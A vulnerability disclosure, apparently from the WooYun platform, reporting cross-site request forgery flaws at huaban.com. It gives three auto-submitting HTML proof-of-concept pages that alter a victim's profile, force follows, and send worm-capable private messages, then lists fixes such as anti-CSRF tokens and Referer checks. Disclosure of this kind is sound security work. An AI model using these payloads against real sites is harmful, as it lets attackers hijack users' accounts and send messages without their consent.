花瓣网全站点多处功能设计缺陷导致跨站请求伪造(CSRF)(可利用私信功能影响全站注册用户)。
花瓣网全站点多处功能设计缺陷导致跨站请求伪造(CSRF)。
poc全部在下方。
本次影响范围:(包括但不限于)
网站用户个人资料篡改。
网站任意用户刷粉丝。
全站用户私信可被蠕虫。
网站用户个人资料篡改:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>花瓣网CSRF跨站请求伪造安全漏洞POC</title>
</head>
<body>
<form name="name1" action="http://huaban.com/settings/" method="post">
<input type="hidden" name="user[username]" value="argzs"/>
<input type="hidden" name="profile[sex]" value="0"/>
<input type="hidden" name="profile[about]" value="aryj CSRF!"/>
</form>
<script>
window.onload=function(){
document.name1.submit();
}
</script>
</body>
</html>
网站任意用户刷粉丝:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>花瓣网CSRF跨站请求伪造安全漏洞POC</title>
</head>
<body>
<form name="name1" action="http://huaban.com/xiaomeihehe2012/follow/" method="post">
</form>
<script>
window.onload=function(){
document.name1.submit();
}
</script>
</body>
</html>
全站用户私信可被蠕虫:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>花瓣网CSRF跨站请求伪造安全漏洞POC</title>
</head>
<body>
<form name="name1" action="http://huaban.com/dm/send/" method="post">
<input type="hidden" name="to_user_id" value="13056618"/>
<input type="hidden" name="text" value="test by 安然意境@Wooyun"/>
</form>
<script>
window.onload=function(){
document.name1.submit();
}
</script>
</body>
</html>
解决方案:
1.验证码被认为是对抗CSRF攻击最简洁有效的防御方法。
2.Referer Check.
3.Anti CSRF Token.